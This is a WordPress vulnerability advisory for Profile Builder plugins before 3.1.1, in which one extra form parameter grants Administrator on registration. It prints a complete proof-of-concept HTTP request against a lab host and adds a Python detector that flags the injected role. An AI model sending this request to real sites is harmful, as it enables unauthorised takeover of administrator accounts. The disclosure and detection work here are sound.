Profile Builder and Profile Builder Pro < 3.1.1 - User Registration With Administrator Role

2020-02-10T00:00:00
ID WPEX-ID:10066
Type wpexploit
Reporter Noman Riffat
Modified 2020-02-15T00:00:00

Description

WordPress Vulnerability - Profile Builder and Profile Builder Pro < 3.1.1 - User Registration With Administrator Role

Adding the following extra parameter to the registration form POST body, or to the profile edit POST body, creates the user as, or upgrades the user to, Administrator.

custom_field_user_role=administrator

The problem is on line 194 of the file profile-builder/front-end/default-fields/user-role/user-role.php, as of the latest version, 3.1.0.

POST /wordpress-5.3.2/register/ HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------21180001813424994471925010347
Content-Length: 1686
Origin: http://wp.lab
DNT: 1
Connection: close
Referer: http://wp.lab/wordpress-5.3.2/register/
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="username"

test
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="first_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="last_name"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="nickname"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="email"

test@localhost.org
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="custom_field_user_role"

administrator
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="description"


-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw1"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="passw2"

xxxxxxxx
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="action"

register
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="form_name"

unspecified
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="register_unspecified_nonce_field"

d02f43e49c
-----------------------------21180001813424994471925010347
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress-5.3.2/register/
-----------------------------21180001813424994471925010347--
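The captured request above, seen from the defender's side: an added example (not from the advisory or the plugin's own code) that parses the multipart body and flags a registration POST carrying custom_field_user_role with a privileged value, as a WAF rule or a request-triage hook would. The sample body is constructed from the fields of the request shown above; PRIVILEGED_ROLES is an assumption about which roles a self-registration form must never assign.

```python
"""Detect role injection via custom_field_user_role in a Profile Builder
registration POST (added example; sample request body constructed below)."""
import re

# Assumption: roles a public registration form must never be able to assign.
PRIVILEGED_ROLES = {"administrator", "editor"}
ROLE_PARAM = "custom_field_user_role"   # parameter named in the advisory


def parse_multipart(body: str, boundary: str) -> dict:
    """Return {field_name: value} for a multipart/form-data body."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.removeprefix("\r\n").removesuffix("\r\n")
        if part in ("", "--"):          # preamble or closing delimiter
            continue
        head, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', head)
        if match:
            fields[match.group(1)] = value
    return fields


def check_registration_request(content_type: str, body: str):
    """Return a finding dict when the request carries a role override, else None."""
    if "boundary=" not in content_type:
        return None
    boundary = content_type.split("boundary=", 1)[1].strip().strip('"')
    fields = parse_multipart(body, boundary)
    if ROLE_PARAM not in fields:
        return None
    role = fields[ROLE_PARAM].strip().lower()   # tolerate "Administrator "
    return {
        "param": ROLE_PARAM,
        "role": role,
        "username": fields.get("username", ""),
        "severity": "high" if role in PRIVILEGED_ROLES else "info",
    }


# Constructed sample: the essential fields of the captured request above.
BOUNDARY = "---------------------------21180001813424994471925010347"
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = "\r\n".join([
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="username"', "", "test",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="email"', "", "test@localhost.org",
    f"--{BOUNDARY}", f'Content-Disposition: form-data; name="{ROLE_PARAM}"', "", "administrator",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="action"', "", "register",
    f"--{BOUNDARY}--", "",
])

if __name__ == "__main__":
    print(check_registration_request(SAMPLE_CONTENT_TYPE, SAMPLE_BODY))
```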